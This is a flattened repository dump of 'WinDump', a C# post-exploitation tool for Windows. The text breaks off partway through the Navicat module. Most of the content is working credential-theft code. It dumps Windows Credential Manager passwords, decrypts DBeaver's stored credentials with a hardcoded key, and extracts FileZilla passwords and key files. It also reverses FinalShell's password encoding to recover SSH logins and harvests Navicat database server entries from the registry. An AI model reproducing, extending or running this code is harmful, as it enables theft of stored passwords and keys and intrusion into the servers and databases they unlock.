├── .gitattributes ├── .github └── workflows │ └── build.yml ├── .gitignore ├── Cred ├── BrowserChromiumBased.cs ├── Credential.cs ├── DBeaver.cs ├── FileZilla.cs ├── FinalShell.cs ├── MobaXterm.cs ├── Navicat.cs ├── OpenVPN.cs ├── Putty.cs ├── RDP.cs ├── SecureCRT.cs ├── TightVNC.cs ├── UltraVNC.cs ├── WinSCP.cs └── XManager.cs ├── Directories.cs ├── Files.cs ├── LICENSE.txt ├── Network ├── DNSCache.cs ├── Interface.cs ├── Netstat.cs ├── Route.cs └── WIFI.cs ├── Process.cs ├── Program.cs ├── Properties └── AssemblyInfo.cs ├── README.md ├── Resource.Designer.cs ├── Resource.resx ├── Resources ├── index.html └── index.html.gz ├── SystemInfo.cs ├── User.cs ├── Utils.cs ├── WinDump.csproj ├── WinDump.sln ├── av ├── README.md ├── auto.json ├── out.txt └── todotnet.py └── windump.png /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /.github/workflows/build.yml: -------------------------------------------------------------------------------- 1 | name: Build 2 | 3 | on: 4 | push: 5 | tags: 6 | - "v*.*.*" 7 | 8 | jobs: 9 | build: 10 | runs-on: windows-latest 11 | 12 | steps: 13 | - uses: actions/checkout@v4 14 | 15 | - name: Setup MSBuild 16 | uses: microsoft/setup-msbuild@v1 17 | 18 | - name: Build solution 19 | run: msbuild WinDump.sln /p:Configuration=Release 20 | 21 | - name: Release 22 | uses: softprops/action-gh-release@v1 23 | if: startsWith(github.ref, 'refs/tags/') 24 | with: 25 | files: ./bin/Release/WinDump.exe 26 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Oo]ut/ 33 | [Ll]og/ 34 | [Ll]ogs/ 35 | 36 | # Visual Studio 2015/2017 cache/options directory 37 | .vs/ 38 | # Uncomment if you have tasks that create the project's static files in wwwroot 39 | #wwwroot/ 40 | 41 | # Visual Studio 2017 auto generated files 42 | Generated\ Files/ 43 | 44 | # MSTest test Results 45 | [Tt]est[Rr]esult*/ 46 | [Bb]uild[Ll]og.* 47 | 48 | # NUnit 49 | *.VisualState.xml 50 | TestResult.xml 51 | nunit-*.xml 52 | 53 | # Build Results of an ATL Project 54 | [Dd]ebugPS/ 55 | [Rr]eleasePS/ 56 | dlldata.c 57 | 58 | # Benchmark Results 59 | BenchmarkDotNet.Artifacts/ 60 | 61 | # .NET Core 62 | project.lock.json 63 | project.fragment.lock.json 64 | artifacts/ 65 | 66 | # ASP.NET Scaffolding 67 | ScaffoldingReadMe.txt 68 | 69 | # StyleCop 70 | StyleCopReport.xml 71 | 72 | # Files built by Visual Studio 73 | *_i.c 74 | *_p.c 75 | *_h.h 76 | *.ilk 77 | *.meta 78 | *.obj 79 | *.iobj 80 | *.pch 81 | *.pdb 82 | *.ipdb 83 | *.pgc 84 | *.pgd 85 | *.rsp 86 | *.sbr 87 | *.tlb 88 | *.tli 89 | *.tlh 90 | *.tmp 91 | *.tmp_proj 92 | *_wpftmp.csproj 93 | *.log 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 295 | *.vbw 296 | 297 | # Visual Studio LightSwitch build output 298 | **/*.HTMLClient/GeneratedArtifacts 299 | **/*.DesktopClient/GeneratedArtifacts 300 | **/*.DesktopClient/ModelManifest.xml 301 | **/*.Server/GeneratedArtifacts 302 | **/*.Server/ModelManifest.xml 303 | _Pvt_Extensions 304 | 305 | # Paket dependency manager 306 | .paket/paket.exe 307 | paket-files/ 308 | 309 | # FAKE - F# Make 310 | .fake/ 311 | 312 | # CodeRush personal settings 313 | .cr/personal 314 | 315 | # Python Tools for Visual Studio (PTVS) 316 | __pycache__/ 317 | *.pyc 318 | 319 | # Cake - Uncomment if you are using it 320 | # tools/** 321 | # !tools/packages.config 322 | 323 | # Tabs Studio 324 | *.tss 325 | 326 | # Telerik's JustMock configuration file 327 | *.jmconfig 328 | 329 | # BizTalk build output 330 | *.btp.cs 331 | *.btm.cs 332 | *.odx.cs 333 | *.xsd.cs 334 | 335 | # OpenCover UI analysis results 336 | OpenCover/ 337 | 338 | # Azure Stream Analytics local run output 339 | ASALocalRun/ 340 | 341 | # MSBuild Binary and Structured Log 342 | *.binlog 343 | 344 | # NVidia Nsight GPU debugger configuration file 345 | *.nvuser 346 | 347 | # MFractors (Xamarin productivity tool) working folder 348 | .mfractor/ 349 | 350 | # Local History for Visual Studio 351 | .localhistory/ 352 | 353 | # BeatPulse healthcheck temp database 354 | healthchecksdb 355 | 356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 357 | MigrationBackup/ 358 | 359 | # Ionide (cross platform F# VS Code tools) working folder 360 | .ionide/ 361 | 362 | # Fody - auto-generated XML schema 363 | FodyWeavers.xsd -------------------------------------------------------------------------------- /Cred/Credential.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.IO; 5 | using System.Runtime.InteropServices; 6 | using System.Security; 7 | using System.Security.Cryptography; 8 | using System.Text; 9 | 10 | namespace WinDump 11 | { 12 | internal class Credential 13 | { 14 | internal static DataTable GetCred() 15 | { 16 | var dt = new DataTable(); 17 | dt.Columns.Add("Target"); 18 | dt.Columns.Add("User"); 19 | dt.Columns.Add("Pwd"); 20 | if (CredEnumerate(null, 1, out int count, out IntPtr pCredentials)) 21 | { 22 | for (int i = 0; i < count; i++) 23 | { 24 | IntPtr credential = Marshal.ReadIntPtr(pCredentials, i * IntPtr.Size); 25 | if (credential != IntPtr.Zero) 26 | { 27 | CREDENTIAL cred = (CREDENTIAL)Marshal.PtrToStructure(credential, typeof(CREDENTIAL)); 28 | 29 | string targetName = cred.TargetName; 30 | string userName = cred.UserName; 31 | string password = string.Empty; 32 | 33 | if (cred.CredentialBlob != IntPtr.Zero && cred.CredentialBlobSize > 0) 34 | { 35 | byte[] passwordBytes = new byte[cred.CredentialBlobSize]; 36 | Marshal.Copy(cred.CredentialBlob, passwordBytes, 0, (int)cred.CredentialBlobSize); 37 | if (LooksLikeUTF16LE(passwordBytes)) 38 | { 39 | password = Encoding.Unicode.GetString(passwordBytes); 40 | } 41 | else 42 | { 43 | 44 | password = Encoding.UTF8.GetString(passwordBytes); 45 | } 46 | } 47 | 48 | dt.Rows.Add(targetName, userName, password); 49 | } 50 | } 51 | 52 | CredFree(pCredentials); 53 | } 54 | 55 | return dt; 56 | } 57 | internal static bool LooksLikeUTF16LE(byte[] data) 58 | { 59 | int zeros = 0; 60 | for (int i = 1; i < data.Length; i += 2) 61 | { 62 | if (data[i] == 0x00) 63 | zeros++; 64 | } 65 | 66 | float ratio = (float)zeros / (data.Length / 2); 67 | return ratio >= 0.5; // 超过一半的高位是0,可能是UTF-16LE编码 68 | } 69 | private enum CredentialType : uint 70 | { 71 | Generic = 1, 72 | DomainPassword, 73 | DomainCertificate, 74 | DomainVisiblePassword, 75 | GenericCertificate, 76 | DomainExtended, 77 | Maximum, 78 | MaximumEx = Maximum + 1000, 79 | } 80 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 81 | private struct CREDENTIAL 82 | { 83 | public uint Flags; 84 | public CredentialType Type; 85 | [MarshalAs(UnmanagedType.LPWStr)] 86 | public string TargetName; 87 | [MarshalAs(UnmanagedType.LPWStr)] 88 | public string Comment; 89 | public System.Runtime.InteropServices.ComTypes.FILETIME LastWritten; 90 | public uint CredentialBlobSize; 91 | public IntPtr CredentialBlob; 92 | public uint Persist; 93 | public uint AttributeCount; 94 | public IntPtr Attributes; 95 | public IntPtr TargetAlias; 96 | [MarshalAs(UnmanagedType.LPWStr)] 97 | public string UserName; 98 | } 99 | 100 | [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] 101 | private static extern bool CredEnumerate(string filter, int flag, out int count, out IntPtr pCredentials); 102 | 103 | [DllImport("advapi32.dll", SetLastError = true)] 104 | private static extern void CredFree(IntPtr cred); 105 | 106 | 107 | } 108 | 109 | } 110 | -------------------------------------------------------------------------------- /Cred/DBeaver.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.IO; 4 | using System.Security.Cryptography; 5 | using System.Text; 6 | 7 | namespace WinDump 8 | { 9 | internal class DBeaver 10 | { 11 | internal static string Decrypt(string filePath, byte[] key, byte[] iv) 12 | { 13 | byte[] encryptedBytes = File.ReadAllBytes(filePath); 14 | 15 | using (var aes = new RijndaelManaged()) 16 | { 17 | aes.Key = key; 18 | aes.IV = iv; 19 | aes.Mode = CipherMode.CBC; 20 | aes.Padding = PaddingMode.PKCS7; 21 | 22 | using (MemoryStream memoryStream = new MemoryStream(encryptedBytes)) 23 | { 24 | using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read)) 25 | { 26 | var skip = new byte[16]; 27 | cryptoStream.Read(skip, 0, 16); 28 | using (StreamReader streamReader = new StreamReader(cryptoStream, Encoding.UTF8)) 29 | { 30 | return streamReader.ReadToEnd(); 31 | } 32 | } 33 | } 34 | } 35 | } 36 | internal static string GetDBeaver() 37 | { 38 | var path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "DBeaverData"); 39 | if (!Directory.Exists(path)) 40 | { 41 | return ""; 42 | } 43 | var sourcePath = Path.Combine(path, "workspace6\\General\\.dbeaver\\data-sources.json"); 44 | var sources = ""; 45 | if (File.Exists(sourcePath)) { 46 | sources = File.ReadAllText(sourcePath); 47 | } 48 | var credsPath = Path.Combine(path, "workspace6\\General\\.dbeaver\\credentials-config.json"); 49 | var creds = ""; 50 | if (File.Exists(credsPath)) 51 | { 52 | // "babb4a9f774ab853c96c2d653dfe544a", "00000000000000000000000000000000" 53 | var key = new byte[] { 0xBA, 0xBB, 0x4A, 0x9F, 0x77, 0x4A, 0xB8, 0x53, 0xC9, 0x6C, 0x2D, 0x65, 0x3D, 0xFE, 0x54, 0x4A }; 54 | var iv = new byte[16]; 55 | try 56 | { 57 | creds = Decrypt(credsPath, key, iv); 58 | } 59 | catch { } 60 | } 61 | return sources + "\n" + creds; 62 | } 63 | } 64 | } 65 | -------------------------------------------------------------------------------- /Cred/FileZilla.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.IO; 5 | using System.Text; 6 | using System.Xml; 7 | 8 | namespace WinDump 9 | { 10 | internal class FileZilla 11 | { 12 | internal static DataTable GetFileZilla() 13 | { 14 | var dt = new DataTable(); 15 | dt.Columns.Add("Name"); 16 | dt.Columns.Add("Proto"); 17 | dt.Columns.Add("Host"); 18 | dt.Columns.Add("Port"); 19 | dt.Columns.Add("Username"); 20 | dt.Columns.Add("Pwd/Key"); 21 | var data = Files.DumpFile(@"%APPDATA%\FileZilla\recentservers.xml", out bool ok); 22 | if (ok) 23 | { 24 | try 25 | { 26 | 27 | Parse(dt, data, "/FileZilla3/RecentServers"); 28 | } 29 | catch { } 30 | } 31 | data = Files.DumpFile(@"%APPDATA%\FileZilla\sitemanager.xml", out ok); 32 | if (ok) 33 | { 34 | try 35 | { 36 | 37 | Parse(dt, data, "/FileZilla3/Servers"); 38 | } 39 | catch { } 40 | } 41 | return dt; 42 | } 43 | internal static void Parse(DataTable dt, string data, string xpath) 44 | { 45 | var xmlDoc = new XmlDocument(); 46 | xmlDoc.LoadXml(data); 47 | foreach (XmlNode node in xmlDoc.SelectNodes(xpath)) 48 | { 49 | string host = string.Empty; 50 | string port = string.Empty; 51 | string username = string.Empty; 52 | string pwdkey = string.Empty; 53 | string proto = string.Empty; 54 | string name = string.Empty; 55 | foreach (XmlNode serverNode in node.ChildNodes) 56 | { 57 | foreach (XmlNode itemNode in serverNode.ChildNodes) 58 | switch (itemNode.Name) 59 | { 60 | case "Name": 61 | name = itemNode.InnerText; 62 | break; 63 | case "Host": 64 | host = itemNode.InnerText; 65 | break; 66 | case "Port": 67 | port = itemNode.InnerText; 68 | break; 69 | case "User": 70 | username = itemNode.InnerText; 71 | break; 72 | case "Pass": 73 | pwdkey = itemNode.InnerText; 74 | if (itemNode.Attributes.Count != 0) 75 | { 76 | pwdkey = Encoding.UTF8.GetString(Convert.FromBase64String(pwdkey)); 77 | } 78 | break; 79 | case "Keyfile": 80 | var keypath = itemNode.InnerText; 81 | if (File.Exists(keypath)) 82 | { 83 | pwdkey = File.ReadAllText(keypath); 84 | } 85 | break; 86 | case "Protocol": 87 | switch (itemNode.InnerText) 88 | { 89 | case "0": 90 | proto = "ftp"; 91 | break; 92 | case "1": 93 | proto = "sftp"; 94 | break; 95 | default: 96 | proto = "unknow"; 97 | break; 98 | } 99 | break; 100 | } 101 | dt.Rows.Add(name, proto, host, port, username, pwdkey); 102 | } 103 | 104 | } 105 | 106 | } 107 | } 108 | } 109 | -------------------------------------------------------------------------------- /Cred/FinalShell.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.IO; 5 | using System.Security.Cryptography; 6 | using System.Text; 7 | using System.Text.RegularExpressions; 8 | namespace WinDump 9 | { 10 | internal class FinalShell 11 | { 12 | static readonly Regex reUser = new Regex("\"user_name\":\"(.*?)\"", RegexOptions.Compiled); 13 | static readonly Regex rePwd = new Regex("\"password\":\"(.*?)\"", RegexOptions.Compiled); 14 | static readonly Regex reHost = new Regex("\"host\":\"(.*?)\"", RegexOptions.Compiled); 15 | static readonly Regex rePort = new Regex("\"port\":(.*?),", RegexOptions.Compiled); 16 | static readonly Regex reKey = new Regex("\"secret_key_id\":\"(.*?)\"", RegexOptions.Compiled); 17 | static readonly Regex reKeyList = new Regex("\"id\":\"(.*?)\",\"key_data\":\"(.*?)\"", RegexOptions.Compiled); 18 | internal static DataTable GetFinalShell() 19 | { 20 | DataTable dt = new DataTable(); 21 | dt.Columns.Add("Host"); 22 | dt.Columns.Add("Port"); 23 | dt.Columns.Add("User"); 24 | dt.Columns.Add("Pwd"); 25 | dt.Columns.Add("KeyID"); 26 | string connPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\finalshell\conn"; 27 | if (!Directory.Exists(connPath)) 28 | { 29 | return dt; 30 | } 31 | foreach (var file in Directory.GetFiles(connPath, "*.json")) 32 | { 33 | var json = File.ReadAllText(file); 34 | var user = GetGroup(reUser, json); 35 | var pwd = DecodePass(GetGroup(rePwd, json)); 36 | var host = GetGroup(reHost, json); 37 | var port = GetGroup(rePort, json); 38 | var keyid = GetGroup(reKey, json); 39 | dt.Rows.Add(host, port, user, pwd, keyid); 40 | } 41 | return dt; 42 | } 43 | internal static DataTable GetFinalShellKey() 44 | { 45 | DataTable dt = new DataTable(); 46 | dt.Columns.Add("KeyID"); 47 | dt.Columns.Add("Content"); 48 | string configPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\finalshell\config.json"; 49 | if (!File.Exists(configPath)) 50 | { 51 | return dt; 52 | } 53 | var mc = reKeyList.Matches(File.ReadAllText(configPath)); 54 | foreach (Match m in mc) 55 | { 56 | var key = Encoding.UTF8.GetString(Convert.FromBase64String(m.Groups[2].Value)); 57 | dt.Rows.Add(m.Groups[1], key); 58 | } 59 | return dt; 60 | 61 | } 62 | internal static string GetGroup(Regex re, string text) 63 | { 64 | var m = re.Match(text); 65 | if (m.Success) 66 | { 67 | return m.Groups[1].Value; 68 | } 69 | return ""; 70 | } 71 | internal static byte[] desDecode(byte[] data, byte[] head) 72 | { 73 | byte[] TripleDesIV = { 0, 0, 0, 0, 0, 0, 0, 0 }; 74 | byte[] key = new byte[8]; 75 | Array.Copy(head, key, 8); 76 | DESCryptoServiceProvider des = new DESCryptoServiceProvider(); 77 | des.Key = key; 78 | des.IV = TripleDesIV; 79 | MemoryStream ms = new MemoryStream(); 80 | CryptoStream cs = new CryptoStream(ms, des.CreateDecryptor(), CryptoStreamMode.Write); 81 | cs.Write(data, 0, data.Length); 82 | cs.FlushFinalBlock(); 83 | return ms.ToArray(); 84 | } 85 | 86 | internal static string DecodePass(string data) 87 | { 88 | if (data.Length == 0) 89 | { 90 | return data; 91 | } 92 | else 93 | { 94 | byte[] buf = Convert.FromBase64String(data); 95 | byte[] head = new byte[8]; 96 | Array.Copy(buf, 0, head, 0, head.Length); 97 | byte[] d = new byte[buf.Length - head.Length]; 98 | Array.Copy(buf, head.Length, d, 0, d.Length); 99 | byte[] randombytes = ranDomKey(head); 100 | byte[] bt = desDecode(d, randombytes); 101 | return Encoding.UTF8.GetString(bt); 102 | 103 | 104 | } 105 | } 106 | static byte[] ranDomKey(byte[] head) 107 | { 108 | long ks = 3680984568597093857L / new JavaRng(head[5]).nextInt(127); 109 | JavaRng random = new JavaRng(ks); 110 | int t = head[0]; 111 | 112 | for (int i = 0; i < t; ++i) 113 | { 114 | random.nextLong(); 115 | } 116 | 117 | long n = random.nextLong(); 118 | JavaRng r2 = new JavaRng(n); 119 | long[] ld = new long[] { (long)head[4], r2.nextLong(), (long)head[7], (long)head[3], r2.nextLong(), (long)head[1], random.nextLong(), (long)head[2] }; 120 | using (MemoryStream stream = new MemoryStream()) 121 | { 122 | using (BinaryWriter writer = new BinaryWriter(stream)) 123 | { 124 | long[] var15 = ld; 125 | int var14 = ld.Length; 126 | 127 | for (int var13 = 0; var13 < var14; ++var13) 128 | { 129 | long l = var15[var13]; 130 | 131 | try 132 | { 133 | byte[] writeBuffer = new byte[8]; 134 | writeBuffer[0] = (byte)(l >> 56); 135 | writeBuffer[1] = (byte)(l >> 48); 136 | writeBuffer[2] = (byte)(l >> 40); 137 | writeBuffer[3] = (byte)(l >> 32); 138 | writeBuffer[4] = (byte)(l >> 24); 139 | writeBuffer[5] = (byte)(l >> 16); 140 | writeBuffer[6] = (byte)(l >> 8); 141 | writeBuffer[7] = (byte)(l >> 0); 142 | writer.Write(writeBuffer); 143 | } 144 | catch 145 | { 146 | return null; 147 | } 148 | } 149 | 150 | byte[] keyData = stream.ToArray(); 151 | keyData = md5(keyData); 152 | return keyData; 153 | } 154 | } 155 | } 156 | 157 | internal static byte[] md5(byte[] data) 158 | { 159 | try 160 | { 161 | MD5 md5Hash = MD5.Create(); 162 | byte[] md5data = md5Hash.ComputeHash(data); 163 | return md5data; 164 | } 165 | catch 166 | { return null; } 167 | } 168 | 169 | } 170 | internal class JavaRng 171 | { 172 | public JavaRng(long seed) 173 | { 174 | _seed = (seed ^ LARGE_PRIME) & ((1L << 48) - 1); 175 | } 176 | 177 | public long nextLong() 178 | { 179 | return ((long)next(32) << 32) + next(32); 180 | } 181 | 182 | public int nextInt(int bound) 183 | { 184 | if (bound <= 0) 185 | throw new ArgumentOutOfRangeException("bound", bound, "bound must be positive"); 186 | 187 | int r = next(31); 188 | int m = bound - 1; 189 | if ((bound & m) == 0) // i.e., bound is a power of 2 190 | r = (int)((bound * (long)r) >> 31); 191 | else 192 | { 193 | for (int u = r; 194 | u - (r = u % bound) + m < 0; 195 | u = next(31)) 196 | ; 197 | } 198 | return r; 199 | } 200 | 201 | public int NextInt(int n) 202 | { 203 | if (n <= 0) 204 | throw new ArgumentOutOfRangeException("n", n, "n must be positive"); 205 | 206 | if ((n & -n) == n) // i.e., n is a power of 2 207 | return (int)((n * (long)next(31)) >> 31); 208 | 209 | int bits, val; 210 | 211 | do 212 | { 213 | bits = next(31); 214 | val = bits % n; 215 | } while (bits - val + (n - 1) < 0); 216 | return val; 217 | } 218 | 219 | private int next(int bits) 220 | { 221 | _seed = (_seed * LARGE_PRIME + SMALL_PRIME) & ((1L << 48) - 1); 222 | return (int)((_seed) >> (48 - bits)); 223 | } 224 | 225 | private long _seed; 226 | 227 | private const long LARGE_PRIME = 0x5DEECE66DL; 228 | private const long SMALL_PRIME = 0xBL; 229 | } 230 | } 231 | -------------------------------------------------------------------------------- /Cred/MobaXterm.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | 5 | namespace WinDump 6 | { 7 | internal class MobaXterm 8 | { 9 | } 10 | } 11 | -------------------------------------------------------------------------------- /Cred/Navicat.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Win32; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Data; 5 | using System.IO; 6 | using System.Security.Cryptography; 7 | using System.Text; 8 | 9 | namespace WinDump 10 | { 11 | internal class Navicat 12 | { 13 | internal static Navicat11Cipher cipher = new Navicat11Cipher(); 14 | internal static readonly Dictionary names = new Dictionary 15 | { 16 | { "Navicat", "MySql" }, 17 | { "NavicatMSSQL", "SQL Server" }, 18 | { "NavicatORA", "Oracle" }, 19 | { "NavicatPG", "pgsql" }, 20 | { "NavicatMARIADB", "MariaDB" }, 21 | { "NavicatMONGODB","MongoDB"}, 22 | //{ "NavicatSQLite","SQLite"} 23 | }; 24 | 25 | internal static DataTable GetNavicat(out DataTable dtkey) 26 | { 27 | DataTable dt = new DataTable(); 28 | dt.Columns.Add("Type"); 29 | dt.Columns.Add("Name"); 30 | dt.Columns.Add("Host"); 31 | dt.Columns.Add("Port"); 32 | dt.Columns.Add("User"); 33 | dt.Columns.Add("Pwd"); 34 | dt.Columns.Add("SSHHost"); 35 | dt.Columns.Add("SSHPort"); 36 | dt.Columns.Add("SSHUser"); 37 | dt.Columns.Add("SSHPwd"); 38 | dt.Columns.Add("SSHPhrase"); 39 | dt.Columns.Add("SSHKey"); 40 | dtkey = new DataTable(); 41 | dtkey.Columns.Add("Path"); 42 | dtkey.Columns.Add("Content"); 43 | var keyDict = new Dictionary(); 44 | using (var key = Registry.CurrentUser.OpenSubKey(@"Software\PremiumSoft", false)) 45 | { 46 | if (key == null) 47 | { 48 | return dt; 49 | } 50 | foreach(KeyValuePairitem in names){ 51 | var regName = item.Key; 52 | var typName = item.Value; 53 | using (var subkey = key.OpenSubKey(regName+@"\Servers",false)) 54 | { 55 | if(subkey == null) 56 | { 57 | continue; 58 | } 59 | foreach (var sername in subkey.GetSubKeyNames()) 60 | { 61 | using (var serkey = subkey.OpenSubKey(sername,false)) 62 | { 63 | if(serkey == null) 64 | { 65 | continue; 66 | } 67 | DumpServer(dt,keyDict, serkey, typName,sername); 68 | } 69 | } 70 | 71 | } 72 | } 73 | 74 | } 75 | foreach(var item in keyDict){ 76 | dtkey.Rows.Add(item.Key, item.Value); 77 | } 78 | 